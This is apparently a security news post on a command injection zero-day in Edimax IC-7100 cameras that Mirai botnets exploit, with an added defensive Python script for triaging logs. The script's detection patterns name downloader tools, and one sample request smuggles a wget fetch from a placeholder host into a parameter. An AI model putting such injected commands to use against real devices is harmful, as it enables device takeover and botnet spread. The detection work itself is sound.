Critical Zero-Day Flaw in Edimax IP Cameras Exploited by Mirai-Based Botnets

Mirai-based botnets are exploiting a zero-day flaw in Edimax IP cameras for remote command execution. US CISA warns of the vulnerability, urging organizations to report suspicious activity.

TL;DR

Mirai-based botnets are exploiting a zero-day flaw (CVE-2025-1316) in Edimax IP cameras to achieve remote command execution. The US CISA has issued a warning about this critical vulnerability, urging organizations to report any suspicious activity. The flaw, which affects all versions of Edimax IC-7100 IP cameras, allows attackers to execute remote commands by sending specially crafted requests.

Mirai-based botnets are actively exploiting a zero-day vulnerability in Edimax IP cameras to achieve remote command execution. This critical flaw, tracked as CVE-2025-1316, has a CVSS score of 9.8 and affects all versions of Edimax IC-7100 IP cameras. The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning about this vulnerability, urging organizations to report any suspected malicious activity.

Understanding the Vulnerability

The issue stems from an Improper Neutralization of Special Elements used in an OS Command, commonly known as OS Command Injection. Edimax IC-7100 IP cameras fail to properly sanitize requests, allowing attackers to create specially crafted requests to achieve remote code execution on the device. According to the advisory published by CISA:

“Successful exploitation of this vulnerability could allow an attacker to send specially crafted requests to achieve remote code execution on the device. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.”

Impact and Mitigation

The flaw impacts all versions of Edimax IC-7100 IP cameras, which are end-of-life products. This means that the vendor has not addressed the vulnerability, leaving these devices exposed to potential attacks. Although the advisory does not confirm exploitation of the flaw in the wild, CISA urges organizations to report any suspected malicious activity for tracking and correlation.

Discovery and Exploitation

Akamai researchers discovered the vulnerability and confirmed that it is being actively exploited in the wild. Multiple Mirai-based botnets are currently exploiting this and other flaws in Edimax IC-7100 IP cameras. Threat actors use remote command execution to run a shell script that downloads a Mirai malware payload from a remote server. Despite being notified in October 2024, the vendor has been unresponsive to both CISA and Akamai. Akamai warns that the vulnerability may affect supported devices as well.
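
One way to triage web or proxy logs for the pattern described above, where an injected command fetches a script from a remote server (an added example, not code from Akamai, CISA or the original post). The page does not name the affected endpoint or parameter, so the path, parameter names and sample requests below are constructed placeholders, and the indicator lists are assumptions to tune per environment.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Characters that let a parameter value start a second shell command.
SHELL_META = re.compile(r"[;|&`\n]|\$\(")
# Download tools typically used to pull a second-stage script onto a device.
FETCH_TOOL = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b", re.IGNORECASE)

def inspect_request(method, target, body=""):
    """Return (severity, findings); findings maps parameter -> indicators."""
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if method.upper() == "POST":
        params += parse_qsl(body, keep_blank_values=True)
    findings = {}
    for name, value in params:  # values are URL-decoded by parse_qsl
        hits = []
        if SHELL_META.search(value):
            hits.append("shell-metachar")
        if FETCH_TOOL.search(value):
            hits.append("fetch-tool")
        if hits:
            findings.setdefault(name, []).extend(hits)
    severity = "none"
    for hits in findings.values():
        if "shell-metachar" in hits and "fetch-tool" in hits:
            severity = "high"    # command break-out plus a downloader
        elif severity == "none":
            severity = "medium"  # a single indicator, worth a look
    return severity, findings

# Constructed sample requests (method, target, body); the path and parameter
# names are hypothetical and the address is from a documentation range.
SAMPLE_REQUESTS = [
    ("GET", "/cgi-bin/example.cgi?name=frontdoor&mode=1", ""),
    ("POST", "/cgi-bin/example.cgi",
     "name=cam1%3Bwget+http%3A%2F%2F198.51.100.7%2Fplaceholder.sh"),
    ("GET", "/cgi-bin/example.cgi?name=a%26b", ""),
]

def triage(requests):
    """Return (severity, target, findings) for requests with any indicator."""
    scored = [(inspect_request(m, t, b), t) for m, t, b in requests]
    return [(sev, t, f) for (sev, f), t in scored if sev != "none"]

if __name__ == "__main__":
    for row in triage(SAMPLE_REQUESTS):
        print(row)
```

Requests scored "high" toward a camera's management interface are the kind of suspected malicious activity the CISA advisory asks organizations to report.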

About Mirai Botnets

Mirai is a type of malware that turns networked devices running Linux into remotely controlled bots, which can be used as part of a botnet in large-scale network attacks. It primarily targets online consumer devices such as IP cameras and home routers. The Mirai botnet was first discovered in August 2016 and has since been used in some of the largest and most disruptive distributed denial of service (DDoS) attacks.

This post is licensed under CC BY 4.0 by the author.